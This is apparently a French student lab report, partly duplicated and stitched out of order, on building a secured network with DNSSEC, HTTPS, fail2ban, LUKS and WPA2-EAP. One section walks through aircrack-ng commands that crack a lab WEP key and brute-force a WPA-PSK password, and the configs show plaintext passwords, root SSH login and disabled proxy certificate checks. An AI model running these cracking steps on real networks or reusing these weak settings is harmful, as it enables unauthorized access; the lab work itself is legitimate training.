inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic</syntaxhighlight>

=== Installation des paquets de base ===

<syntaxhighlight lang="bash">apt update && apt upgrade -y
apt install -y ssh apache2 bind9 bind9utils \
fail2ban openssl iptables-persistent \
net-tools curl wget vim</syntaxhighlight>

== Configuration de la machine mandataire (SE4.Solstice) ==


=== Configuration réseau ===

<syntaxhighlight lang="bash"># Fichier /etc/network/interfaces
auto lo
iface lo inet loopback

# Interface publique (réseau routé)
auto eth1
iface eth1 inet static
address 193.48.57.167/27
gateway 193.48.57.162 # Adresse VRRP virtuelle

iface eth1 inet6 auto

# Interface privée (vers Moon)
auto eth0
iface eth0 inet static
address 192.168.20.1/24

iface eth0 inet6 auto

# Vérification
root@Solstice:~# ip a show eth1
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1
inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic</syntaxhighlight>

=== Mise en place de la mascarade (NAT) ===

<syntaxhighlight lang="bash"># Activation du forwarding IP
echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf
sysctl -p

# Règles iptables pour la mascarade
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT

# Sauvegarde pour persistance
iptables-save > /etc/iptables/rules.v4

# Ajout dans interfaces pour chargement au démarrage
post-up iptables-restore < /etc/iptables/rules.v4</syntaxhighlight>

= Services Internet =


== Serveur SSH ==


=== Configuration SSH sur Moon ===

<syntaxhighlight lang="bash"># Édition du fichier de configuration
vim /etc/ssh/sshd_config

# Modifications apportées :
PermitRootLogin yes
PasswordAuthentication yes
Port 22
# LogLevel VERBOSE

# Redémarrage du service
systemctl restart ssh
systemctl enable ssh</syntaxhighlight>

=== Redirection de ports pour l’accès IPv4 ===

<syntaxhighlight lang="bash"># Redirection du port 2201 vers Moon (SSH)
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \
-j DNAT --to-destination 192.168.20.2:22

iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT

# Sauvegarde
iptables-save > /etc/iptables/rules.v4

# Test de la redirection
ssh -p 2201 root@193.48.57.167 # Arrive sur Moon</syntaxhighlight>

== Serveur DNS ==


=== Configuration du serveur maître (Moon) ===

<syntaxhighlight lang="bash"># Fichier /etc/bind/named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "default";
inline-signing yes;
allow-transfer {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fe47:bbe7;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
also-notify {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
notify yes;
};

# Fichier de zone /etc/bind/zones/db.msalhi.online
$TTL 86400
@ IN SOA ns1.msalhi.online. admin.msalhi.online. (
2026020320 ; Serial INCRÉMENTÉ et corrigé
3600 ; Refresh
1800 ; Retry
604800 ; Expire
86400 ; Minimum TTL
)

; Serveurs de noms
@ IN NS ns1.msalhi.online.
@ IN NS ns1.merteuil.tech.

; Enregistrements
@ IN A 193.48.57.167
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe6f:f548
ns1 IN A 193.48.57.167
ns1 IN AAAA 2001:660:4401:60a0:216:3eff:fe6f:f548

www IN CNAME msalhi.online.

# Vérification
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online</syntaxhighlight>

=== Configuration du serveur secondaire (Solstice) ===

<syntaxhighlight lang="bash"># Fichier /etc/bind/named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "default";
inline-signing yes;
allow-transfer {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fe47:bbe7;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
also-notify {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
notify yes;
};

# Redémarrage et vérification
systemctl restart bind9
ls -la /var/lib/bind/db.msalhi.online</syntaxhighlight>

=== Configuration chez le registrar Gandi ===

{| class="wikitable"
|+ Configuration DNS chez Gandi
|-
! style="text-align: left;"| '''Type'''
! style="text-align: left;"| '''Valeur'''
! style="text-align: left;"| '''Description'''
|-
| style="text-align: left;"| Nameservers
| style="text-align: left;"| ns1.msalhi.online
| style="text-align: left;"| Serveur DNS primaire
|-
| style="text-align: left;"|
| style="text-align: left;"| ns1.merteuil.tech
| style="text-align: left;"| Serveur DNS secondaire
|-
| style="text-align: left;"| Glue Record 1
| style="text-align: left;"| ns1.msalhi.online
| style="text-align: left;"| IPv6: 2001:660:4401:60a0:216:3eff:fe47:bbe7
|-
| style="text-align: left;"| Glue Record 2
| style="text-align: left;"| ns2.msalhi.online
| style="text-align: left;"| IPv4: 193.48.57.167
|}


== Sécurisation de site Web par certificat ==


=== Génération du CSR et obtention du certificat ===

<syntaxhighlight lang="bash"># Génération de la clé privée
openssl genrsa -out /etc/ssl/private/myserver.key 2048

# Génération du CSR
openssl req -new -key /etc/ssl/private/myserver.key \
-out /etc/ssl/private/server.csr</syntaxhighlight>

=== Configuration Apache sur Moon (HTTPS direct IPv6) ===

<syntaxhighlight lang="bash"># Fichier /etc/apache2/sites-available/msalhi-ssl.conf
<VirtualHost *:80>
ServerName msalhi.online
ServerAlias www.msalhi.online
Redirect permanent / https://msalhi.online/
</VirtualHost>

<VirtualHost *:443>
ServerName msalhi.online
ServerAlias www.msalhi.online

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt
SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key
SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem

Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
Header always set X-Frame-Options DENY
Header always set X-Content-Type-Options nosniff

ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log
CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined
</VirtualHost>

# Activation
a2enmod ssl
a2ensite msalhi-ssl.conf
systemctl restart apache2</syntaxhighlight>

=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===

<syntaxhighlight lang="bash"># Fichier /etc/apache2/sites-available/msalhi-proxy.conf
<VirtualHost *:80>
ServerName msalhi.online
Redirect permanent / https://msalhi.online/
</VirtualHost>

<VirtualHost *:443>
ServerName msalhi.online

SSLEngine on
SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt
SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key
SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem

SSLProxyEngine on
ProxyPreserveHost On

# Utilisation de l'URL avec nom de domaine comme demandé
ProxyPass / https://msalhi.online/
ProxyPassReverse / https://msalhi.online/

SSLProxyVerify none
SSLProxyCheckPeerCN off

ErrorLog ${APACHE_LOG_DIR}/proxy_error.log
CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined
</VirtualHost>

# Activation des modules
a2enmod proxy proxy_http ssl
a2ensite msalhi-proxy.conf
systemctl restart apache2</syntaxhighlight>

== Sécurisation de serveur DNS par DNSSEC ==


=== Configuration DNSSEC automatique ===

<syntaxhighlight lang="bash"># Création du répertoire pour les clés
mkdir -p /etc/bind/keys
chown bind:bind /etc/bind/keys

# Ajout dans named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

# Politique DNSSEC dans named.conf.options
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

# Redémarrage et vérification
systemctl restart bind9
dig @localhost msalhi.online DNSKEY +dnssec</syntaxhighlight>

=== Résultat des clés DNSSEC générées ===

<pre>; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec

msalhi.online. 3600 IN DNSKEY 256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==
msalhi.online. 3600 IN DNSKEY 257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==
msalhi.online. 3600 IN DNSKEY 257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==</pre>

=== Enregistrement de la KSK chez Gandi ===

{| class="wikitable"
|+ Configuration DNSSEC chez Gandi
|-
! style="text-align: left;"| '''Paramètre'''
! style="text-align: left;"| '''Valeur'''
|-
| style="text-align: left;"| Algorithm
| style="text-align: left;"| 13 (ECDSAP256SHA256)
|-
| style="text-align: left;"| Flags
| style="text-align: left;"| 257 (KSK)
|-
| style="text-align: left;"| Public Key
| style="text-align: left;"| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==
|}

= Effraction WiFi =

== Cassage de clef WEP d’un point d’accès WiFi ==
Le réseau cible était <code>cracotte01</code> (BSSID <code>04:DA:D2:9C:50:50</code>, canal 4). La procédure a été réalisée depuis la machine <code>zabeth13</code> avec les outils <code>aircrack-ng</code>.

<ol>
<li>Passage de la carte en mode monitor :
<syntaxhighlight lang="bash">sudo airmon-ng start wlan0</syntaxhighlight>
</li>
<li>Capture ciblée :
<syntaxhighlight lang="bash">sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w capture_wep wlan0mon</syntaxhighlight>
</li>
<li>Authentification fake (association au point d’accès) :
<syntaxhighlight lang="bash">sudo aireplay-ng -1 6000 -o 1 -q 10 -e cracotte01 -a 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon</syntaxhighlight>
</li>
<li>Attaque ARP replay pour générer du trafic :
<syntaxhighlight lang="bash">sudo aireplay-ng -3 -b 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon</syntaxhighlight>
</li>
<li>Après accumulation d’environ 40 000 IVs, lancement de aircrack‑ng :
<syntaxhighlight lang="bash">sudo aircrack-ng capture_wep-01.cap</syntaxhighlight>
</li>
</ol>

La clé WEP a été trouvée en moins de 15 minutes : <code>FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE</code>.

== Cassage de mot de passe WPA‑PSK par force brute ==
Le réseau <code>kracotte01</code> (BSSID <code>44:AD:D9:5F:87:00</code>, canal 13) utilisait WPA2‑PSK.

<ol>
<li>Capture ciblée :
<syntaxhighlight lang="bash">sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:00 -w wpa_capture wlan0mon</syntaxhighlight>
</li>
<li>Désauthentification d’un client (identifié <code>40:A5:EF:01:25:8B</code>) pour forcer un handshake :
<syntaxhighlight lang="bash">sudo aireplay-ng -0 10 -a 44:AD:D9:5F:87:00 -c 40:A5:EF:01:25:8B wlan0mon</syntaxhighlight>
</li>
<li>Après apparition du message '''“WPA handshake”''' dans <code>airodump‑ng</code>, lancement de l’attaque par dictionnaire (mots de passe à 8 chiffres) :
<syntaxhighlight lang="bash">crunch 8 8 0123456789 | sudo aircrack-ng -b 44:AD:D9:5F:87:00 -w - wpa_capture-06.cap</syntaxhighlight>
</li>
<li>Résultat : le mot de passe <code>66689666</code> a été découvert après environ 30 minutes.</li>
</ol>

Ces tests illustrent la vulnérabilité des protocoles WEP et des mots de passe courts face à des attaques par force brute.

----

= Sécurisations =

== Chiffrement de données ==
Sur Moon, une partition supplémentaire (disque virtuel <code>xvdb</code>, correspondant au volume LVM <code>SE4.Moon.home</code>) a été chiffrée avec LUKS.

<syntaxhighlight lang="bash">
# Chiffrement de la partition
cryptsetup luksFormat /dev/xvdb

# Ouverture du conteneur
cryptsetup open /dev/xvdb home_crypt

# Création d’un système de fichiers
mkfs.ext4 /dev/mapper/home_crypt

# Montage manuel
mount /dev/mapper/home_crypt /mnt/secret
</syntaxhighlight>

Pour automatiser le montage au démarrage, on ajoute dans <code>/etc/crypttab</code> :
<pre>
home_crypt /dev/xvdb none luks
</pre>
et dans <code>/etc/fstab</code> :
<pre>
/dev/mapper/home_crypt /home ext4 defaults 0 2
</pre>

Le mot de passe doit être saisi manuellement à chaque démarrage, ce qui est acceptable pour un serveur de test.

== Filtrage des services – fail2ban ==
Pour protéger SSH et les requêtes DNS malveillantes, <code>fail2ban</code> a été installé sur Moon et Solstice.

Fichier <code>/etc/fail2ban/jail.local</code> :
<pre>
[DEFAULT]
bantime = 3600
findtime = 600
maxretry = 3

[sshd]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 3

[named-refused-tcp]
enabled = true
port = domain,953
protocol = tcp
filter = named-refused
logpath = /var/log/named/security.log
maxretry = 3
</pre>

Filtre <code>/etc/fail2ban/filter.d/named-refused.conf</code> :
<pre>
[Definition]
failregex = ^\S+ named\[\d+\]: client <HOST>#\S+ .* query .* denied
ignoreregex =
</pre>

Le service est démarré et activé :
<syntaxhighlight lang="bash">
systemctl enable fail2ban
systemctl restart fail2ban
</syntaxhighlight>

== Sécurisation WiFi par WPA2‑EAP ==

=== Serveur FreeRADIUS sur Moon ===
Installation :
<syntaxhighlight lang="bash">
apt install freeradius freeradius-utils -y
</syntaxhighlight>

Ajout du client (point d’accès) dans <code>/etc/freeradius/3.0/clients.conf</code> :
<pre>
client vlan1_ap1 {
ipaddr = 172.27.0.4 # VLAN 1 management
secret = testing123
shortname = cisco-ap1-vlan1
nas_type = cisco
}
client vlan1_ap2 {
ipaddr = 172.27.0.3 # VLAN 1 management
secret = testing123
shortname = cisco-ap2-vlan1
nas_type = cisco
}

</pre>

Création d’un utilisateur dans <code>/etc/freeradius/3.0/users</code> :
<pre>
"msalhi" Cleartext-Password := "WifiSecure2026!"

"etudiant1" Cleartext-Password := "Password123"

"prof" Cleartext-Password := "AdminSE4!"

</pre>

Configuration EAP pour PEAP‑MSCHAPv2 dans <code>/etc/freeradius/3.0/mods-enabled/eap</code> (type par défaut <code>peap</code>, tunnel intérieur <code>mschapv2</code>).
Un conflit de port (18120) a été résolu en commentant la section <code>listen</code> dans <code>/etc/freeradius/3.0/sites-enabled/inner-tunnel</code> (ou en mettant <code>port = 0</code>).

Test local :
<syntaxhighlight lang="bash">
radtest msalhi WifiSecure2026! localhost 0 testing123

Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76
User-Name = "msalhi"
User-Password = "WifiSecure2026!"
NAS-IP-Address = 127.0.0.1
NAS-Port = 0
Message-Authenticator = 0x00
Cleartext-Password = "WifiSecure2026!"
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20
</syntaxhighlight>
→ réponse <code>Access-Accept</code> attendue.

=== Configuration du point d’accès WiFi ===
Sur le point d’accès (wifi‑E304), les lignes suivantes ont été ajoutées (en conservant les configurations des autres étudiants) :
<syntaxhighlight lang="cisco">
aaa group server radius radius_student25
server 192.168.20.2 auth-port 1812 acct-port 1813

aaa authentication login eap_student25 group radius_student25

dot11 ssid VM_SERVICES_15
vlan 25
authentication open eap eap_student25
authentication network-eap eap_student25
authentication key-management wpa version 2
mbssid guest-mode

interface Dot11Radio0
encryption vlan 25 mode ciphers aes-ccm
ssid VM_SERVICES_15

interface Dot11Radio0.25
encapsulation dot1Q 25
bridge-group 25

interface GigabitEthernet0.25
encapsulation dot1Q 25
bridge-group 25

radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key radius_secret_salhi_2026
</syntaxhighlight>

=== Configuration DHCP sur les routeurs ===
Sur '''E304''' (plage 100‑150) :
<syntaxhighlight lang="cisco">
ip dhcp excluded-address 10.60.15.1 10.60.15.99
ip dhcp excluded-address 10.60.15.151 10.60.15.254

ip dhcp pool SALHI_VLAN25
network 10.60.15.0 255.255.255.0
default-router 10.60.15.1
dns-server 192.168.20.2 8.8.8.8
domain-name msalhi.online
lease 0 12
</syntaxhighlight>

Sur '''E306''' (plage 151‑200), configuration similaire avec une plage différente.

=== Policy‑Based Routing (PBR) ===
Pour que le trafic IPv4 du VLAN 25 passe par Solstice (où il sera NATé vers Internet), on a configuré sur E304 :

<syntaxhighlight lang="cisco">
ip access-list extended TRAFIC_VLAN25
permit ip 10.60.15.0 0.0.0.255 any
!
route-map PBR_VLAN25 permit 10
match ip address TRAFIC_VLAN25
set ip next-hop 193.48.57.167
!
interface Vlan25
ip policy route-map PBR_VLAN25
</syntaxhighlight>

Cette politique force tout le trafic IPv4 du VLAN 25 vers Solstice. La mascarade a ensuite été élargie sur Solstice pour inclure ce réseau :
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -s 10.60.15.0/24 -o eth1 -j MASQUERADE
iptables-save > /etc/iptables/rules.v4
</syntaxhighlight>

=== Tests ===
Un client connecté au SSID <code>VM_SERVICES_15</code> obtient une adresse IP dans la plage DHCP (ex. <code>10.60.15.101</code>), peut résoudre des noms DNS (via Moon) et accéder à Internet. Le traceroute montre le passage par Solstice (<code>193.48.57.167</code>).

Atelier SysRes SE4 2025/2026 E15

2026-02-27T11:24:46Z

Msalhi :

<div class="titlepage">

'''Rapport de Projet SE4 IdO 
Sécurité Système/Réseau'''

'''Année Universitaire 2025-2026'''

<div class="figure">

[[File:polytech_logo.png|image]]

</div>
'''Étudiant: Mohamed SALHI'''

'''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''

'''Domaine: <code>msalhi.online</code>'''

'''École Polytechnique Universitaire de Lille'''

2026-02-02

</div>

= Introduction =

Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.

L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :

* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse
* Une infrastructure réseau redondante avec routeurs Cisco C9200
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)


= Atelier système et réseau - Machines virtuelles =


== Création des machines virtuelles ==

Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 <code>capbreton.plil.info</code>.


=== Commandes de création ===

<syntaxhighlight lang="bash"># Création de la machine de services SE4.Moon
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \
--bridge=pontKS --dir=/usr/local/xen --size=10GB \
--dist=daedalus --memory=2048M --force

# Création de la machine mandataire SE4.Solstice
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \
--bridge=pontKS --dir=/usr/local/xen --size=10GB \
--dist=daedalus --memory=2048M --force</syntaxhighlight>

=== Démarrage et connexion ===

<syntaxhighlight lang="bash"># Démarrage des VMs
xen create /etc/xen/SE4.Moon.cfg
xen create /etc/xen/SE4.Solstice.cfg

# Connexion aux consoles
xen console SE4.Moon
xen console SE4.Solstice

# Liste des VMs actives
root@capbreton:~# xen list
Name ID Mem VCPUs State Time(s)
SE4.Solstice 39 2048 1 -b---- 2560.1
SE4.Moon 119 2048 1 -b---- 452.3</syntaxhighlight>

== Configuration de la machine de services (SE4.Moon) ==


=== Montage des partitions LVM pour /var et /home ===

<syntaxhighlight lang="bash"># Création des fichiers de partition sur le Dom0
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual

# Modification du fichier de configuration Xen
disk = [
'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.Moon.home,xvdb,w',
'phy:/dev/virtual/SE4.Moon.var,xvdc,w',
]</syntaxhighlight>

=== Formatage et montage des partitions ===

<syntaxhighlight lang="bash"># Formatage des partitions
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc

# Montage temporaire et copie des données
mount /dev/xvdc /mnt
mv /var/* /mnt/
umount /mnt

mount /dev/xvdb /mnt
mv /home/* /mnt/
umount /mnt

# Configuration du fstab
cat > /etc/fstab << EOF
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb /home ext4 defaults 0 2
/dev/xvdc /var ext4 defaults 0 2
EOF

# Application des modifications
mount -a</syntaxhighlight>

=== Configuration réseau ===

<syntaxhighlight lang="bash"># Fichier /etc/network/interfaces
auto lo
iface lo inet loopback

# Interface réseau privée (vers Solstice)
auto eth0
iface eth0 inet static
address 192.168.20.2/24
gateway 192.168.20.1

# Configuration IPv6 automatique
iface eth0 inet6 auto

# Vérification
root@Moon:~# ip a show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0
inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic</syntaxhighlight>

=== Installation des paquets de base ===

<syntaxhighlight lang="bash">apt update && apt upgrade -y
apt install -y ssh apache2 bind9 bind9utils \
fail2ban openssl iptables-persistent \
net-tools curl wget vim</syntaxhighlight>

== Configuration de la machine mandataire (SE4.Solstice) ==


=== Configuration réseau ===

<syntaxhighlight lang="bash"># Fichier /etc/network/interfaces
auto lo
iface lo inet loopback

# Interface publique (réseau routé)
auto eth1
iface eth1 inet static
address 193.48.57.167/27
gateway 193.48.57.162 # Adresse VRRP virtuelle

iface eth1 inet6 auto

# Interface privée (vers Moon)
auto eth0
iface eth0 inet static
address 192.168.20.1/24

iface eth0 inet6 auto

# Vérification
root@Solstice:~# ip a show eth1
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1
inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic</syntaxhighlight>

=== Mise en place de la mascarade (NAT) ===

<syntaxhighlight lang="bash"># Activation du forwarding IP
echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf
sysctl -p

# Règles iptables pour la mascarade
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT

# Sauvegarde pour persistance
iptables-save > /etc/iptables/rules.v4

# Ajout dans interfaces pour chargement au démarrage
post-up iptables-restore < /etc/iptables/rules.v4</syntaxhighlight>

= Services Internet =


== Serveur SSH ==


=== Configuration SSH sur Moon ===

<syntaxhighlight lang="bash"># Édition du fichier de configuration
vim /etc/ssh/sshd_config

# Modifications apportées :
PermitRootLogin yes
PasswordAuthentication yes
Port 22
# LogLevel VERBOSE

# Redémarrage du service
systemctl restart ssh
systemctl enable ssh</syntaxhighlight>

=== Redirection de ports pour l’accès IPv4 ===

<syntaxhighlight lang="bash"># Redirection du port 2201 vers Moon (SSH)
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \
-j DNAT --to-destination 192.168.20.2:22

iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT

# Sauvegarde
iptables-save > /etc/iptables/rules.v4

# Test de la redirection
ssh -p 2201 root@193.48.57.167 # Arrive sur Moon</syntaxhighlight>

== Serveur DNS ==


=== Configuration du serveur maître (Moon) ===

<syntaxhighlight lang="bash"># Fichier /etc/bind/named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "default";
inline-signing yes;
allow-transfer {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fe47:bbe7;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
also-notify {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
notify yes;
};

# Fichier de zone /etc/bind/zones/db.msalhi.online
$TTL 86400
@ IN SOA ns1.msalhi.online. admin.msalhi.online. (
2026020320 ; Serial INCRÉMENTÉ et corrigé
3600 ; Refresh
1800 ; Retry
604800 ; Expire
86400 ; Minimum TTL
)

; Serveurs de noms
@ IN NS ns1.msalhi.online.
@ IN NS ns1.merteuil.tech.

; Enregistrements
@ IN A 193.48.57.167
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe6f:f548
ns1 IN A 193.48.57.167
ns1 IN AAAA 2001:660:4401:60a0:216:3eff:fe6f:f548

www IN CNAME msalhi.online.

# Vérification
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online</syntaxhighlight>

=== Configuration du serveur secondaire (Solstice) ===

<syntaxhighlight lang="bash"># Fichier /etc/bind/named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "default";
inline-signing yes;
allow-transfer {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fe47:bbe7;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
also-notify {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
notify yes;
};

# Redémarrage et vérification
systemctl restart bind9
ls -la /var/lib/bind/db.msalhi.online</syntaxhighlight>

=== Configuration chez le registrar Gandi ===

{| class="wikitable"
|+ Configuration DNS chez Gandi
|-
! style="text-align: left;"| '''Type'''
! style="text-align: left;"| '''Valeur'''
! style="text-align: left;"| '''Description'''
|-
| style="text-align: left;"| Nameservers
| style="text-align: left;"| ns1.msalhi.online
| style="text-align: left;"| Serveur DNS primaire
|-
| style="text-align: left;"|
| style="text-align: left;"| ns1.merteuil.tech
| style="text-align: left;"| Serveur DNS secondaire
|-
| style="text-align: left;"| Glue Record 1
| style="text-align: left;"| ns1.msalhi.online
| style="text-align: left;"| IPv6: 2001:660:4401:60a0:216:3eff:fe47:bbe7
|-
| style="text-align: left;"| Glue Record 2
| style="text-align: left;"| ns2.msalhi.online
| style="text-align: left;"| IPv4: 193.48.57.167
|}


== Sécurisation de site Web par certificat ==


=== Génération du CSR et obtention du certificat ===

<syntaxhighlight lang="bash"># Génération de la clé privée
openssl genrsa -out /etc/ssl/private/myserver.key 2048

# Génération du CSR
openssl req -new -key /etc/ssl/private/myserver.key \
-out /etc/ssl/private/server.csr</syntaxhighlight>

=== Configuration Apache sur Moon (HTTPS direct IPv6) ===

<syntaxhighlight lang="bash"># Fichier /etc/apache2/sites-available/msalhi-ssl.conf
<VirtualHost *:80>
ServerName msalhi.online
ServerAlias www.msalhi.online
Redirect permanent / https://msalhi.online/
</VirtualHost>

<VirtualHost *:443>
ServerName msalhi.online
ServerAlias www.msalhi.online

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt
SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key
SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem

Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
Header always set X-Frame-Options DENY
Header always set X-Content-Type-Options nosniff

ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log
CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined
</VirtualHost>

# Activation
a2enmod ssl
a2ensite msalhi-ssl.conf
systemctl restart apache2</syntaxhighlight>

=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===

<syntaxhighlight lang="bash"># Fichier /etc/apache2/sites-available/msalhi-proxy.conf
<VirtualHost *:80>
ServerName msalhi.online
Redirect permanent / https://msalhi.online/
</VirtualHost>

<VirtualHost *:443>
ServerName msalhi.online

SSLEngine on
SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt
SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key
SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem

SSLProxyEngine on
ProxyPreserveHost On

# Utilisation de l'URL avec nom de domaine comme demandé
ProxyPass / https://msalhi.online/
ProxyPassReverse / https://msalhi.online/

SSLProxyVerify none
SSLProxyCheckPeerCN off

ErrorLog ${APACHE_LOG_DIR}/proxy_error.log
CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined
</VirtualHost>

# Activation des modules
a2enmod proxy proxy_http ssl
a2ensite msalhi-proxy.conf
systemctl restart apache2</syntaxhighlight>

== Sécurisation de serveur DNS par DNSSEC ==


=== Configuration DNSSEC automatique ===

<syntaxhighlight lang="bash"># Création du répertoire pour les clés
mkdir -p /etc/bind/keys
chown bind:bind /etc/bind/keys

# Ajout dans named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

# Politique DNSSEC dans named.conf.options
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
